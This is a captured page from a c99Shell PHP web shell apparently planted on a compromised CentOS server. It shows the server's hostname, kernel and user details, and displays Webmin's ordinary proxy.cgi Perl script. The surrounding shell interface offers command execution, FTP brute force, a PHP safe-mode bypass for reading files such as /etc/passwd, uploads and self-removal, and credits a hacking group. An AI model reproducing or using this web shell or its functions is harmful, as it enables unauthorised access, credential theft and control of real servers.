!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/usr/libexec/webmin/ajaxterm/   drwxr-xr-x
Free 50.94 GB of 127.8 GB (39.86%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     proxy.cgi (1.65 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
#!/usr/bin/perl
# Proxy an Ajaxterm request to the real port

BEGIN { push(@INC, ".."); };
use WebminCore;

# Since this script is run on every keypress, init_config is intentionally
# not called to reduce startup time.
#&init_config();

# Parse out port
$ENV{'PATH_INFO'} =~ /^\/(\d+)(.*)$/ ||
    &error("Missing or invalid PATH_INFO");
$port = $1;
$path = $2;
$| = 1;
$meth = $ENV{'REQUEST_METHOD'};

# Connect to the Ajaxterm server, send HTTP request
$con = &make_http_connection("localhost", $port, 0, $meth, $path);
&error($con) if (!ref($con));
&write_http_connection($con, "Host: localhost\r\n");
&write_http_connection($con, "User-agent: Webmin\r\n");
$cl = $ENV{'CONTENT_LENGTH'};
&write_http_connection($con, "Content-length: $cl\r\n") if ($cl);
&write_http_connection($con, "Content-type: $ENV{'CONTENT_TYPE'}\r\n")
        if ($ENV{'CONTENT_TYPE'});
&write_http_connection($con, "\r\n");
if ($cl) {
        &read_fully(STDIN, \$post, $cl);
        &write_http_connection($con, $post);
        }

# read back the headers
$dummy = &read_http_connection($con);
while(1) {
        ($headline = &read_http_connection($con)) =~ s/\r|\n//g;
        last if (!$headline);
        $headline =~ /^(\S+):\s+(.*)$/ || &error("Bad header");
        $header{lc($1)} = $2;
        $headers .= $headline."\n";
        }
print $headers,"\n";

# read back contents
while($buf = &read_http_connection($con, 1024)) {
    print $buf;
        }
&close_http_connection($con);

# Touch status file to indicate it is still running
$statusdir = $ENV{'WEBMIN_VAR'}."/ajaxterm";
if (!-d $statusdir) {
    &make_dir($statusdir, 0700);
    }
&open_tempfile(TOUCH, ">$statusdir/$port", 0, 1);
&close_tempfile(TOUCH);


:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0068 ]--